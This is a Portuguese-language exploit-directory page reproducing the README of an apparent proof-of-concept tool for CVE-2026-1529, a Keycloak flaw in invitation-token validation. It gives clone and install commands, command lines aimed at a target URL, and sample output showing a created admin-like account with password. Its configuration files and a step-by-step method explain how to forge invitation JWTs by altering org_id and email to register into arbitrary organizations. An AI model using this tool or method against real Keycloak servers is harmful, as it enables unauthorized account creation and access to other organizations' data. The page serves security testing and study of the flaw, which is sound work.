Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHub

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Ver Repositório
110há 7 mesesAinda não revisado

Sobre

CVE-2026-1529 (PoC) é uma vulnerabilidade crítica no Keycloak que permite o registro não autorizado de organizações por meio da validação inadequada do token de convite. Esta ferramenta de exploit demonstra a vulnerabilidade manipulando tokens JWT para registrar usuários em organizações não autorizadas.

Compartilhar

Ferramenta de Exploração do Keycloak CVE-2026-1529

Keycloak: registro não autorizado de organização via validação inadequada de token de convite


Aviso Legal

Esta ferramenta é apenas para fins educacionais e de teste de segurança. Utilize apenas em sistemas para os quais você tenha permissão explícita de teste. O acesso não autorizado a sistemas de computador é ilegal e antiético. Os autores desta ferramenta não são responsáveis por qualquer uso indevido ou dano causado por este software.

Criado por: f3ds cr3w est, 2002


Visão Geral

CVE-2026-1529 é uma vulnerabilidade crítica no Keycloak que permite registro não autorizado de organização por meio de validação inadequada de token de convite. Esta ferramenta de exploração demonstra a vulnerabilidade manipulando tokens JWT para registrar usuários em organizações não autorizadas.

Detalhes Técnicos

  • ID do CVE: CVE-2026-1529
  • Software Afetado: Keycloak (org.keycloak.services.resources.organizations)
  • Pontuação CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Impacto: Acesso não autorizado aos recursos da organização

Descrição da Vulnerabilidade

A vulnerabilidade existe no processo de validação de tokens JWT para convites de organizações. Atacantes podem manipular os campos org_id e email no payload do JWT, permitindo que registrem usuários em qualquer organização sem autorização adequada.


Instalação

Pré-requisitos

  • Python 3.7 ou superior
  • Gerenciador de pacotes pip

Configuração

  1. Clone ou baixe a ferramenta de exploração:
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Instale as dependências necessárias:
pip install -r requirements.txt
  1. Torne o script de exploração executável:
chmod +x keycloak-exploit.py

Uso

Uso Básico

# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Uso Avançado

# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Opções de Linha de Comando

OpçãoDescriçãoObrigatório
targetURL do Keycloak alvo (IP ou domínio)Sim
-t, --tokenToken de convite personalizado a ser usadoNão
-o, --org-idID de organização personalizadoNão
-c, --configCaminho para o arquivo de configuraçãoNão
-d, --debugAtivar registro de depuração (debug)Não
-v, --versionMostrar informações de versãoNão
-h, --helpMostrar mensagem de ajudaNão

Saída

Exploração Bem-sucedida

Quando a exploração é bem-sucedida, você verá uma saída como:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Exploração Mal-sucedida

Se a exploração falhar, você verá:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Estrutura do Projeto

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configuração

Configuração Padrão

A ferramenta usa um arquivo de configuração padrão (config/default_config.json) com as seguintes configurações:

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configuração Personalizada

Você pode criar um arquivo de configuração personalizado e usá-lo com a opção -c:

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Detalhes Técnicos

Processo de Exploração

  1. Análise do Alvo: Verifica se o alvo é uma instância vulnerável do Keycloak
  2. Geração de Token: Gera ou usa um token de convite personalizado
  3. Manipulação do Token: Manipula o payload do JWT para alterar o ID da organização
  4. Registro de Usuário: Registra um usuário usando o token manipulado
  5. Teste de Login: Verifica se o usuário criado consegue fazer login
  6. Geração de Relatório: Cria um relatório detalhado da exploração

Manipulação de JWT

A ferramenta explora a validação inadequada de JWT ao:

  1. Decodificar o token JWT sem verificação de assinatura
  2. Modificar o campo org_id para direcionar uma organização diferente
  3. Modificar o campo email se necessário
  4. Re-encodificar o token com o payload manipulado

Considerações de Segurança

  • A ferramenta usa tratamento de erros e registro de eventos (logging) adequados
  • Todas as solicitações de rede incluem cabeçalhos apropriados
  • A validação de entrada é realizada em todas as entradas do usuário
  • A ferramenta respeita os códigos de resposta do servidor alvo

Solução de Problemas

Problemas Comuns

  1. Erros de Conexão

    • Verifique se a URL do alvo está acessível
    • Confirme se o alvo é uma instância do Keycloak
    • Verifique a conectividade de rede e as configurações de firewall
  2. Erros de Validação de Token

    • Garanta que o formato do token esteja correto
    • Verifique se o token contém os campos obrigatórios (org_id, email, invitation_type)
    • Confirme se o token não está expirado
  3. Falhas no Registro

    • Verifique se o endpoint de registro está acessível
    • Confirme o formato do token manipulado
    • Verifique se o alvo tem o registro de organizações habilitado

Modo de Depuração

Baixar ferramenta